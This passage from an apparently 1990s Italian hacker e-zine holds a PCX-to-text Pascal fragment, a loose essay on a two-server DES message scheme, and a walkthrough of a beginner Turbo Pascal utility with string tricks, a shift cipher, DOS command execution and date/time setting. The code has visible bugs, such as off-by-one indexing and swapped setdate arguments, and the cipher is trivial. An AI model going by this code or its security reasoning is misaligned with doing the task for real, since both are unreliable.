Inc(Char_count);
end;
Close(F2);
end;

var
NNI : NNIptr;

procedure pcx_to_neural_net;

{ get a.PCX; display it; & convert it to txt for neural net. }

var
SPort : Screenptr;
X, Y : integer;
XPt, YPt, RowPt : integer;
S : string;

begin
New(SPort,init);
WITH SPort^ DO
begin
Initialize;
Maxx := GetMaxx;
Maxy := GetMaxy;
SetViewPort(0,0,Maxx,Maxy,ClipOn);
SetTextStyle(DefaultFont, HorizDir, 1);
pcxReturn := pcxSetDisplay(PCX_type);
pcxReturn := pcxFileDisplay(PCX_file,0,0,0);
IF (pcxReturn = pcxSuccess) THEN
begin
Assign(F,Output_file_for_neural_net);
Rewrite(F);
GetViewSettings(ViewInfo); { coordinates of Viewport }
XPt := 0;
YPt := 0;
RowPt := 0;
WHILE RowPt <= ViewInfo.y2 DO
begin
WHILE XPt <= ViewInfo.x2 DO
begin
FOR Y := YPt to (YPt + 7) DO
begin
FOR X := XPt to (XPt + 7) DO
begin
PixelStatus := GetPixel(X,Y);
IF PixelStatus = 0 THEN
write(F,'.')
ELSE
write(F,'X');
end;
writeln(F);
end;
YPt := RowPt;
XPt := XPt + 8;
end;
XPt := 0;
RowPt := RowPt + 8;
YPt := RowPt;
end;
end;
Close(F);
end;
Dispose(SPort,done);
end; { pcx_to_neural_net}


begin { program body }
pcx_to_neural_net;
New(NNI, init);
WITH NNI^ DO
begin
SwapVectors;
exec('C:\COMMAND.COM','/C C:\BATCH\net');
SwapVectors;
IF DosError <> 0 THEN
Writeln('Dos error # ',DosError)
ELSE
Get_weights;
Output_characters;
Dispose(NNI, done);
end;
end.

*****************************************************************************
** ED ORA I GIUSTI COPYRIGHT: {now the right copyright}
** GENESIS; Neural Systems Simulator
**
** Written by: Matt A. Wilson (wilson@smaug.cns.caltech.edu)
** Upinder S. Bhalla (bhalla@aurel.cns.caltech.edu)
** John D. Uhley (uhley@albion.dei.caltech.edu)
** David H. Bilitch (dhb@bek-mc.cns.caltech.edu)
** Mark E. Nelson (nelson@smaug.cns.caltech.edu)
** James M. Bower (jbower@smaug.cns.caltech.edu)
**
** HELIOS compatibility modifications by :-
**
** Michael D. Speight (mds3@smaug.cns.caltech.edu)
**
** X11R4 upgrade modifications by:-
**
** Randall D. Smith (randy@ai.mit.edu)
**
** Copyright 1988, 1989 and 1990 by the California Institute of Technology
**
** Permission to use, copy, modify, and distribute this
** software and its documentation for any purpose and without
** fee is hereby granted, provided that the above copyright
** notice appear in all copies and that both that copyright
** notice and this permission notice appear in supporting
** documentation, and that the name of the California Institute
** of Technology not be used in advertising or publicity pertaining
** to distribution of the software without specific, written prior
** permission. The California Institute of Technology makes no
** representations about the suitability of this software for any purpose.
** It is provided "as is" without express or implied warranty.
**
*****************************************************************************

Continuiamo nel nostro lungo cammino e procediamo all'analisi di un altro
interessante idea che mi e' venuta in mente e che sto sperimentando con
alcuni amici [mit uni forever] allora come bhe sappiamo dicendola semplice
un sistema sicuro di trasmissione non esiste e credo mai esistera' e il des
ormai e' diventato vecchio e obsoleto non piu' in grado di reggere i tool e
gli apperecchi hardware che in pochi giorni rendono facile la decodifica di
questo algoritmo . Bhe cavolo come si puo' allora stare sicuri in questa rete
.. Bhe un hacker direbbe meglio cosi' e' comodo ... ma sto tentando essere
dalla parte dei sysadmin piu'bravi e dei ricercatori .
Prima di tutto un sitema sicuro di trasmissione com gia' visto si basa sulla
trasmissione su due canali da due apparecchi diversi come avviene per gli usa
e la russia che utilizzano aerei a distanza specificate per trasferire
importanti informazioni attraverso aerei che con l'apparecchiatura fornitale
utilizzano due canali : uno per la trasmissione del codice ed uno per le
informazzioni una volta verificato il codice stesso .
Bhe pensiamo di volere fare la stessa cosa sulla rete ... ci ho riflettuto e
non e'facile ma non impossibile... e sarebbe fattibile allora sviluppiamo il
modo e il codice per procedere.

Di che abbiamo bisogno , prima di tutto di due server dedicati al compito su
alta connettivita' [t3 o t1] entrambi devono avere solo 3 porte aperte :

la prima ad esempio telnet nel quale l'utente inserisce le informazioni e
ovvimanete il codice di algoritmo [des al momento ] e i ovviamente il suo
login / passwd [magari anke altre informazioni personali durante il logon
che solo il server conosce ... possibilissimo da implementare]
Bhe dopo questa operazione iniziale il server procede al salvataggio dei
dati su memoria di massa [hd] e procede alla sec fase.
la seconda porta serve al trasferimento del codice del server all'altro
server che la verifica e poi all'invio del codice utente che l'utente
destinatario del messaggio dovra'ricevere .Ora il passaggio codice e' completo
Il server procedera'ora' a aprire su un porta random che sara' comunicata al
software dell'utente che invia il messaggio e a quello che lo riceve. Il
messaggio inviato verra'cmq criptato in des e inviato al destinatario
Il server chiudera'ovvimante la porta aperta e cancellera'il codice dala
memoria di massa.

PROBLEMI A CUI E' DIFFICILE PROVVEDERE:

n.1 il codice utilizzato e' des
n.2 il tempo [lo scambio deve avvenire in tempo reale tra i due server ma
anche tra i due utenti ... il server potra' accettare solo un utente e
non piu' di uno per motivi legati ovviamente alla sicurezza]
n.3 la connessione tra i due server deve essere diretta e non passare per
altri pc altrimenti il fattore sicurezza e' zero.

IDEE CONSEGUITE:

per la n.3 internet e' difficle per la sua implementazione ma possibile
attraverso strutture adeguate [vedi P30000 hehehehe magari] ....
per la n.1 make another codez zcools .... HahAha not a good idea i think
that is more good than a codez that i can do HahAha.....
per la n.2 bhe questo secondo me e' giusto e credo che se anke puo' causare
disguidi aiuti in maniera forte la sicurezza... non avete tempo
aspettare che la vs spia di fiducia si colleghi allora cavoli
vostri hehehe.

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;) ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ed ecco a voi il miglior coder, il pluripremiato e invidiato programmatore,
il pluriricercato da Bill GAYtes, il mitico crackatore...
...hihihi...
...ci avevate creduto...
...e invece no...sono sempre io...io chi?
...continuate a leggere e lo saprete presto...

Salve a tutti questo e' il vostro N0bodY88 che vi scrive questa diciamo
minidescrizione di alcune parti del codice che potete trovare tra gli allegati
sotto il nome di angela.pas (sera :).
Questo programma da me fatto non centra un benemrito caxxo con l'hacking ma
almeno centra un po' con la crittografia e soprattutto la programmazione.
Siccome il programma e' lungo (a sproposito imo) ho pensato di spiegare solo
le parti non intuibili (alla prima okkiata) e anke se so che molti rideranno
di questa mia "creazione" io so che hacking e' uno stato mentale e implica
creativita' e tanta immaginazione quindi....immaginate che sia un bel
programma fatto da un creativo (pensate che rido di me perfino io stesso
hihihi). Allora il primo spezzone che prenderemo in esame sara' quello utile
(?) al capovolgimento di una frase e/o una parola.
Per capovolgere una frase uso un semplice algoritmo che consiste nel leggere
la lunghezza della frase con la funzione Length, dopodiche' si fa un ciclo
che va da 1 alla lunghezza totale della frase e assegniamo a una nuova
variabile azzerata prima del ciclo (x evitare problemi se si riusa questa
parte del programma) una alla volta tutte le lettere, gli spazi e i numeri
assegnando prima l'ultima lettera, poi la penultima, poi la terzultima e
cosi' via. Per ottenere questo basta che alla lunghezza totale togliamo la I
che da 1 andra' in crescendo. Alla fine non ci rimarra altro da fare che
stampare la nostra nuova variabile contenente tutti i valori della frase di
'capov', solo che...capovolti :)

--- INIZIO CODICE ---
capov:=''; olta:='';
GotoXY(10,10); writeln ('Scrivi la frase da capovolgere. ');
GotoXY(10,12); readln (capov);
J:=length(capov);
olta:='';
FOR I:=1 TO J DO
BEGIN
olta:=olta+capov[j-I];
END;
GotoXY(10,15);
writeln ('La frase capovolta e'': ',capov[J]+olta);
GotoXY(10,17);
readln;
--- FINE CODICE ---

La seconda funzione di angela e' semplicissima e serve x crearsi un nuovo
alfabeto derivante da quello tradizionale. In pratica cio' che ho fatto e'
stato richiedere un numero compreso tra 1 e 26 e riempire un array con le
stesse caratteristiche di quello contenente le 26 lettere dell'alfabeto con
un criterio dato dal numero ottenuto in input. Se ad esempio io inserisco il
numero 4 il sotto-programma mi sposta nel secondo array prima le lettere dal
numero scelto, quindi dal 4ø, fino al 26ø poi successivamente vi aggiungeva
le lettere che andavano dalla A fino al numero scelto meno uno (4-1). In
questa maniera noi possiamo cioe' crearci un alfabeto nuovo nuovo da poter
usare in un ns futuro programma di criptazione.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,10); writeln ('Dammi un numero da 1 a 26 ');
GotoXY(10,12); readln (X);
for I:=1 to (26-X+2) do
begin
data2[I-1]:=data1[I+X-2];
end;
for I:=1 to (X-1) do
begin
data2[I+26-X]:=data1[I-1];
end;
GotoXY(10,16); writeln ('Vediamo come sarebbe l''alfabeto se ');
GotoXY(10,17); writeln ('iniziasse x la lettera che hai scelto: ');
GotoXY(10,20);
for I:=1 to 26 do
begin
write (data2[I-1]);
end;
readln;
end;
--- FINE CODICE ---

Qui non c'e' nulla da spiegare ho solo utilizzato il comando FindFirst
passandogli come argomenti una lista di file (prima .EXE e poi .PAS).
Per maggiori informazioni cercate FindFirst nella guida di TP.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(1,5); writeln ('ELENCO FILE .EXE: ');
FindFirst('*.EXE', Archive, DirInfo);
GotoXY(1,7);
while DosError = 0 do
begin
Writeln(DirInfo.Name);
FindNext(DirInfo);
end;
readln;
clrscr;
GotoXY(1,5); writeln ('ELENCO FILE .PAS: ');
FindFirst('*.PAS', Archive, DirInfo);
GotoXY(1,7);
while DosError = 0 do
begin
Writeln(DirInfo.Name);
FindNext(DirInfo);
end;
readln;
end;
--- FINE CODICE ---

Questo spezzone utilizza la funzione Randomize e serve (se non l'avete ancora
capito =) a scegliere una lettera a caso. Il programma randomizza la variabile
I da 1 a 26 e mostra la lettera estratta continuamente cambiandola con un
altra sempre random fino a che (per fermarsi su una delle lettere "casuali")
utilizziamo la forma "until KeyPressed" cioe mostriamo le lettere finche' non
viene premuto un qualsiasi tasto. Stupida cosa che potbbe tornare utile ai
novelli e/o futuri programmatori.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,8); write ('Per fermare e vedere la lettera
random schiacciare la barra');
Randomize;
repeat
begin
GotoXY(10,10);
I:=random(26);
write ('La lettera estratta a caso risulta
essere la ',data1[I]);
end;
until KeyPressed;
readln;
end;
--- FINE CODICE ---

Semplice e inutile programmino che memorizza una frase x poi cancellarne una
parte da noi delimitata. Esempi noi scriviamo una frase tipo
caio maz!
123456789
poi diciamo che vogliamo cancellare dalla parola le lettere dalla 3 alla 7.
Il risultato sara' quindi
caz!
1234
Come dicevo all'inizio inutile...forse...di sicuro...mah...chissa'...

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,6); writeln ('Scrivi una frase di almeno tre parole: ');
GotoXY(10,8); readln (canc);
repeat
GotoXY(10,10); writeln ('Dammi un numero minore della lunghezza della frase: ');
GotoXY(10,12); readln (I);
until I<Length(canc);
repeat
GotoXY(10,14); writeln ('Dimmi quante lettere cancellare: ');
GotoXY(10,16); readln (J);
until (j<(length(canc)-I));
Delete(canc,I,J);
GotoXY(10,18); Writeln('La frase con le lettere tolte risulta essere: ');
GotoXY(10,20); Writeln(canc);
readln;
end;
--- FINE CODICE ---

E mentre Dante qui accanto a me va in delirio perche' leggendo una e-zine
americana ha trovato un errore di allinemanto io vo avanti...il seguente
pezzo di codice affronta un problema che mi era stato presentato da un amico
che non sapeva programmare e che diceva che io ero bravo, dato che sapevo lo
accatiemmeelle....cmq a parte le premesse lo scopo di tal agglomerato di
codice e' di contare in una frase le vocali, le consonanti, le maiuscole,
le minuscole, i numeri e gli spazi. Anke questo e' fatto solo x vedere come
affrontare un problema di questo genere ma come qualsiasi problema basta
pensarci nu poco su e poi andare giu' di nobotesting (come la chiamo la fase
in cui io testo i miei prog del cax).

--- INIZIO CODICE ---
begin
clrscr;
voc:=0; cons:=0; maiusc:=0; minusc:=0; spazi:=0; numfrase:=0;
GotoXY(10,6); writeln ('Scrivi una frase: ');
GotoXY(10,8); readln (frase);
for i:=1 to (length(frase)+1) do
begin
for j:=1 to 5 do
begin
if ((frase[i-1])=vocali[J-1]) then
begin
voc:=voc+1;
minusc:=minusc+1;
end;
if ((frase[i-1])=(upcase(vocali[J-1]))) then
begin
voc:=voc+1;
maiusc:=maiusc+1;
end;
end;
if ((frase[i-1])=' ') then
begin
spazi:=spazi+1;
end;
for x:=1 to 10 do
begin
if ((frase[i-1])=numeri[x-1]) then
begin
numfrase:=numfrase+1;
end;
end;
end;
for i:=1 to (length(frase)+1) do
begin
for J:=1 to 21 do
begin
if (frase[i-1]=consonanti[J-1]) then
begin
cons:=cons+1;
minusc:=minusc+1;
end;
if ((frase[i-1])=(upcase(consonanti[J-1]))) then
begin
cons:=cons+1;
maiusc:=maiusc+1;
end;
end;
end;
GotoXY(10,11); writeln ('Le vocali nella tua frase sono ',voc);
GotoXY(10,12); writeln ('Le consonanti nella tua frase sono ',cons);
GotoXY(10,13); writeln ('Le maiuscole nella tua frase sono ',maiusc);
GotoXY(10,14); writeln ('Le minuscole nella tua frase sono ',minusc);
GotoXY(10,15); writeln ('Gli spazi nella tua frase sono ',spazi);
GotoXY(10,16); writeln ('I numeri nella tua frase sono ',numfrase);
GotoXY(10,18); readln;
end;
--- FINE CODICE ---

In queste poche righe che seguono viene richiesta l'immissione di una
qualsiasi lettere, numero, simbolo, carattere o insieme di caratteri i quali
una volta immessi andranno a riempire lo schermo fino a che noi non pigieremo
un qualsiasi tasto (con la funzione gia' descritta sopra "until keypressed").
Tipico esempio del ciclo (quasi) infinito (anke se da questo si esce ;).
Le due combinazione consigliate rendono lo schermo una scacchiera su cui si
puo' giocare benissimo a scacchi se solo avete abbastanza pedine per riempire
anke solo una fila...

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,10); writeln ('Scrivi quello che vuoi: ');
GotoXY(10,12); writeln ('[ Se vuoi un consiglio prova a scrivere solo ALT+206 o ALT+197 ]');
GotoXY(10,14); readln (quellochevuoi);
repeat
write (quellochevuoi);
until keypressed;
end;
--- FINE CODICE ---

Questa funzione permette di eseguire un programma con alcuni parametri anke
se non molte volte mi e' andato a buon fine, nonostante il codice sia (credo)
pulito.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,10); writeln('Programma da eseguire: ');
GotoXY(10,12); readln (prog);
GotoXY(10,14); write('Parametri da passare al programma ',prog,' : ');
GotoXY(10,16); readln(par);
GotoXY(10,18); writeln('Adesso vediamo se funziona...');
SwapVectors;
Exec(prog,par);
SwapVectors;
clrscr;
GotoXY(10,10); writeln ('...speriamo sia andato tutto a buon fine.');
if (doserror<>0) then
begin
GotoXY(10,12);
writeln('Numero di errore di dos: ',DosError);
end
else
begin
GotoXY(10,14); writeln('Esecuzione andata a buon fine...forse.');
end;
readln;
end;
--- FINE CODICE ---

Siccome nella funzione sopra qualcosa puo' non funzionare e puo' esserci dato
in output un errore di dos soot forma di numero o pensato di mettere nella
opzione successiva una lista dei + comuni errori del dos con una breve e credo
intuibile spiegazione.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,3); writeln (' LISTA ERRORI DOS E LORO SPIEGAZIONI ');
GotoXY(10,6); writeln (' 2 --> File not found ');
GotoXY(10,7); writeln (' 3 --> Path not found ');
GotoXY(10,8); writeln (' 5 --> Access denied ');
GotoXY(10,9); writeln (' 6 --> Invalid handle ');
GotoXY(10,10); writeln (' 8 --> Not enough memory ');
GotoXY(10,11); writeln ('10 --> Invalid environment ');
GotoXY(10,12); writeln ('11 --> Invalid format ');
GotoXY(10,13); writeln ('18 --> No more files ');
GotoXY(10,15); writeln ('Ho voluto mettere questa lista perche'' il ');
GotoXY(10,16); writeln ('programma scelto con l''8 puo'' riportare degli ');
GotoXY(10,17); writeln ('errori dovuti a poca memoria o altro e cosi'' ');
GotoXY(10,18); writeln ('da questa lista potete capire perche'' non funzia.');
GotoXY(10,20); readln;
end;
--- FINE CODICE ---

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
QUESTA FUNZIONE VIENE ESEGUITA SENZA PROBLEMI SOLO SE IL FILE ANGELA E'
CONTENUTO NELLA DIRECTORY C:\WINDOWS\COMMAND [se in modalita' windows] O
NELLA DIRECTORY C:\DOS [se in modalita' dos] ... O ALMENO CREDO =)
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Ovviamente ogni buon consiglio atto a migliorare il prog e la mia conoscenza
stessa e' mooooooooooolto ben accetto, come le critiche d'altronde.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,10); writeln ('Dammi il comando dos che vuoi eseguire: ');
GotoXY(10,12); readln (comando);
if (comando<>'') then
begin
comando:='/C ' + comando;
swapvectors;
exec(getenv('COMSPEC'), comando);
swapvectors;
if (DosError<>0) then
begin
GotoXY(10,14); writeln ('Non si riesce a far eseguire command.com');
GotoXY(10,16); readln;
end
end;
readln;
end;
--- FINE CODICE ---

Questa "utility" (uaaaaaaaaahahahhaha) mostra le linee del tuo dos caricate
in memoria nel momento dell'esecuzione del programma angela.

--- INIZIO CODICE ---
begin
clrscr;
for i:=1 to envcount do
writeln(envstr(i));
readln;
end;
--- FINE CODICE ---

Con questo pezzo si puo' leggere la data odierna e cambiarne il giorno il mese
e l'anno (ovviamente...direte voi :DDDDDDDD).

--- INIZIO CODICE ---
begin
clrscr;
getdate(anno,mese,giorno,ggsettimana);
GotoXY(10,6);
writeln('Oggi e'' esattamente ',giorni[ggsettimana],' ',giorno:0, '/', mese:0, '/', anno:0);
GotoXY(10,8); readln;
anno:=0; mese:=0; giorno:=0;
GotoXY(10,10); writeln ('Vuoi cambiare la data ? (S/N o s/n)');
GotoXY(10,12); readln (risposta);
if (risposta='s') or (risposta='S') then
begin
clrscr;
GotoXY(10,3);
writeln ('ATTENZIOME se immettete dati errati la data non variera''.');
GotoXY(10,5);
writeln ('Dammi il nuovo giorno in numeri : ');
GotoXY(10,7);readln (giorno);
GotoXY(10,9);
writeln ('Dammi il nuovo mese in numeri: ');
GotoXY(10,11);readln (mese);
GotoXY(10,13);
writeln ('Dammi il nuovo anno in numeri: ');
GotoXY(10,15);readln (anno);
setdate(anno,giorno,mese);
GotoXY(10,17);
writeln ('Ora la data e'' impostata sul seguente giorno:');
GotoXY(10,19);
getdate(anno,mese,giorno,ggsettimana);
writeln(giorni[ggsettimana],' ',giorno:0, '/', mese:0, '/', anno:0);
GotoXY(10,21); Readln;
end;
end;
--- FINE CODICE ---

Stessa cosa della funzione precedente solo che qui si puo' visualizzare e poi
eventualmente modificare l'ora, i minuti, i secondi e i centesimi di secondo.

--- INIZIO CODICE ---
begin
clrscr;
risposta:='n';
gettime(ore,minuti,secondi,centesimi);
GotoXY(10,6);
writeln('Adesso sono esattamente le ',leadingzero(ore),
':',leadingzero(minuti),':',leadingzero(secondi),
'.',leadingzero(centesimi));
GotoXY(10,8); readln;
GotoXY(10,10); writeln ('Vuoi cambiare l''ora ? (S/N o s/n)');
GotoXY(10,12); readln (risposta);
if (risposta='s') or (risposta='S') then
begin
clrscr;
GotoXY(10,6); writeln ('Dammi il primo dato: ');
GotoXY(35,6); readln (d1);
GotoXY(10,8); writeln ('Dammi il secondo dato: ');
GotoXY(35,8); readln (d2);
GotoXY(10,10); writeln ('Dammi il terzo dato: ');
GotoXY(35,10); readln (d3);
GotoXY(10,12); writeln ('Dammi il quarto dato: ');
GotoXY(35,12); readln (d4);
settime(d1,d2,d3,d4);
GotoXY(10,14);
writeln('Adesso l''ora e'' impostata sulle '
,leadingzero(ore),':',leadingzero(minuti),
':',leadingzero(secondi),'.',leadingzero(centesimi));
GotoXY(10,16); readln;
end;
end;
--- FINE CODICE ---

Dal nome stesso della funzione memavail si capisce che tramite essa si puo'
vedere la quantita' di memoria available (quindi =disponibile) in un dato
momento.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,10); writeln ('Hai ben ',memavail, ' byte liberi.');
GotoXY(10,12); writeln ('Il blocco libero piu'' grande e'' di ',maxavail,' byte.');
GotoXY(10,14); readln;
end;
--- FINE CODICE ---

Il seguente spezzone serve a sommare + numeri pari e + numeri dispari dandone
poi un rapporto alla fine (lo so manca la somma di tutti i numeri pari e
dispari ma nessuno e' perfetto e alle 1.32 di sabato notte con dante che sta
a fianco a scrivere l'altro articolo non mi sento le forze x cercare il cd con
su pascal per ricompilarlo e fare il nuovo exe...

--- INIZIO CODICE ---
begin
clrscr;
x:=5;
repeat
clrscr;
repeat
GotoXY(10,3); writeln('Dammi il numero degli addendi: ');
GotoXY(10,4); readln (n);
until (n>0);
I:=0; sommap:=0; sommad:=0; contap:=0; contad:=0;
repeat
GotoXY(10,x+1); writeln('Dammi un numero da sommare: ');
GotoXY(10,x+2); readln(numero);
controllo:=numero;
x:=x+2;
if odd(numero) then
begin
GotoXY(16,x);
writeln ('...questo numero e'' --> Dispari');
end
else
begin
GotoXY(16,x);
writeln ('...questo numero e'' --> Pari');
end;
repeat
controllo:=controllo-2
until (controllo=0) or (controllo=1);
if (controllo=0) then
begin
sommap:=sommap+numero;
contap:=contap+1;
end
else
begin
sommad:=sommad+numero;
contad:=contad+1;
end;
i:=i+1;
GotoXY(10,x+1); until i=n;
readln;
clrscr;
GotoXY(10,4); writeln('La somma dei numeri pari e'' uguale a ',sommap);
GotoXY(10,5); writeln('I numeri pari sono uguali a ',contap);
GotoXY(10,6); writeln('La somma dei numeri dispari e'' uguale a ',sommad);
GotoXY(10,7); writeln('I numeri dispari sono uguali a ',contad);
GotoXY(10,9); writeln('Vuoi calcolare la somma di altri numeri? (S/N o s/n)');
GotoXY(10,11); readln(risp);
until (risp='n') or (risp='N');
end;
--- FINE CODICE ---

Questa (a seconda di tutti i miei beta-tester...cioe'...secondo me...) e una
delle funzioni + belle e consiste esattamente nel mostrare a video tutti i
codici ascii e i relativi valori ordinali cosicche' quando vi serve un codice
ascii e non sapete dove sbattere la testa ricordatevi di angela...

--- INIZIO CODICE ---
begin
clrscr;
x:=5;
GotoXY(6,3); writeln ('Questa e'' la lista dei codici ascii con relativi valori ordinali: ');
for i:=1 to 255 do
begin
ascii[i]:=(chr(i));
ascii2[i]:=(ord(i));
end;
clrscr;
for i:=1 to 25 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=25 to 50 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=50 to 75 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=75 to 100 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);

  
end;
readln;
clrscr;
for i:=100 to 125 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=125 to 150 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=150 to 175 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=175 to 200 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=200 to 225 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=225 to 250 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=250 to 255 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]);
end;
readln;
end;
--- FINE CODICE ---

Piccolo programmino che cripta una frase con il metodo spiegato in un mio
precedente articolo sui fondamenti della crittografia (metodo del cifrario
additivo puro e semplice) nel quale potete trovare la spiegazione teorica
di questo caso. Per la parte pratica poi si usa una semplice sostituzione
delle lettere guardando l'indice della lettera in chiaro nell'alfabeto
normale e copiandone in un file temporaneo (che conterra' tutta la frase
criptata) la lettera equivalente dell'alfabeto da noi scelto e creato tenendo
conto dell'indice come dire...esportato dal primo al secondo alfabeto).
Per qualsiasi chiarimento sono pronto a rispondere in mail o se ne verra'
fatta richiesta (scritta ovviamente hihihi) sul prox numba della e-zinnnne.

--- INIZIO CODICE ---
begin
clrscr;
GotoXY(10,4); writeln ('Dammi un numero da 1 a 26 ');
GotoXY(10,5); readln (X);
for I:=1 to (26-X+2) do
begin
lettere2[I-1]:=lettere[I+X-2];
end;
for I:=1 to (X-1) do
begin
lettere2[I+26-X]:=lettere[I-1];
end;
GotoXY(10,7); writeln ('Ora vediamo il confronto tra l''alfabeto normale e');
GotoXY(10,8); writeln ('quello che inizia x la lettera che hai scelto: ');
GotoXY(10,9);
for I:=1 to 26 do
begin
write (lettere[I-1]);
end;
GotoXY(10,10);
for I:=1 to 26 do
begin
write (lettere2[I-1]);
end;
readln;
GotoXY(10,12); writeln ('Ora proviamo a criptare qualcosa. Scrivi una frase');
GotoXY(10,13); readln (cri);
nas:=''; c:=0;
for i:=1 to Length(cri)+1 do
begin
for j:=1 to 26 do
begin
if cri[i-1]=upcase(lettere[j-1]) then
begin
nas:=nas+(upcase(lettere2[j-1]));
end
else
begin
c:=c+1;
end;
if cri[i-1]=lettere[j-1] then
begin
nas:=nas+lettere2[j-1];
end
else
begin
c:=c+1;
end;
if cri[i-1]=' ' then
begin
nas:=nas+' ';
j:=26;
end
else
begin
c:=c+1;
end;
end;
if c=78 then
begin
nas:=nas+cri[i-1];
c:=0;
end;
c:=0;
end;
GotoXY(10,16); writeln ('Questa e'' la tua frase/parola criptata col nuovo alfabeto:');
GotoXY(10,18); writeln (nas);
nas2:=nas;
GotoXY(10,20); readln;
end;
--- FINE CODICE ---

Stessa cosa del precedente sotto-mini-programma con la differenza che se prima
si criptava un afrse adesso la si decripta...

--- INIZIO CODICE ---
begin
clrscr;
nas:=nas2;
if nas='' then
begin
GotoXY(8,6);
writeln ('Devi eseguire il punto 17 prima di questo punto.');
GotoXY(8,7); readln;
end
else
begin
GotoXY(8,3);
writeln ('Ora vediamo se riusciamo a decriptare la seguente frase:');
GotoXY(8,5); writeln (nas);
GotoXY(8,6); readln;
repeat
GotoXY(8,8);
writeln ('Inserisci un numero con il quale provare a decriptare la frase: ');
GotoXY(8,9); readln (x);
until (x>0) and (x<27);
for I:=1 to (26-X+2) do
begin
lettere2[I-1]:=lettere[I+X-2];
end;
for I:=1 to (X-1) do
begin
lettere2[I+26-X]:=lettere[I-1];
end;
GotoXY(8,11); writeln ('Ora vediamo il solito confronto tra l''alfabeto normale e');
GotoXY(8,12); writeln ('quello che inizia x la lettera che hai scelto: ');
GotoXY(8,13);
for I:=1 to 26 do
begin
write (lettere[I-1]);
end;
GotoXY(8,14);
for I:=1 to 26 do
begin
write (lettere2[I-1]);
end;
GotoXY(8,15); readln;
GotoXY(8,16); writeln ('Ora proviamo a decriptare la frase immessa al punto 17: ');
cri:=''; d:=0;
for i:=1 to Length(nas)+1 do
begin
for j:=1 to 26 do
begin
if nas[i-1]=upcase(lettere2[j-1]) then
begin
cri:=cri+(upcase(lettere[j-1]));
end
else
begin
d:=d+1;
end;
if nas[i-1]=lettere2[j-1] then
begin
cri:=cri+lettere[j-1];
end
else
begin
d:=d+1;
end;
if nas[i-1]=' ' then
begin
cri:=cri+' ';
j:=26;
end
else
begin
d:=d+1;
end;
end;
if d=78 then
begin
cri:=cri+nas[i-1];
d:=0;
end
else if (d<>78) then
begin
d:=0;
end;
end;
GotoXY(8,18); writeln (cri);
GotoXY(10,19); readln;
end;
end;
--- FINE CODICE ---

Sulla prossima parte no comment.

--- INIZIO COMMENTO ---
begin
clrscr;
GotoXY(8,2); writeln (' NOTE DI N0bodY88');
GotoXY(8,3); writeln (' Questo programma e'' frutto di alcune ore di studio');
GotoXY(8,4); writeln (' del PASCAL fatte solamente sulla base degli Help che');
GotoXY(8,5); writeln (' ci sono in Turbo Pascal, quindi se volete dirmi che');
GotoXY(8,6); writeln (' voi ci avreste messo meta'' del tempo, l''avreste fatto');
GotoXY(8,7); writeln (' meglio e senza errori...beh...non ditemelo che tanto lo');
GotoXY(8,8); writeln (' so gia'' :P ');
GotoXY(8,9); writeln (' Per quanto riguarda i molti GotoXY e la poca, scarsa e complessa');
GotoXY(8,10); writeln (' grafica considerate che la libreria Graph non mi funzia quindi...');
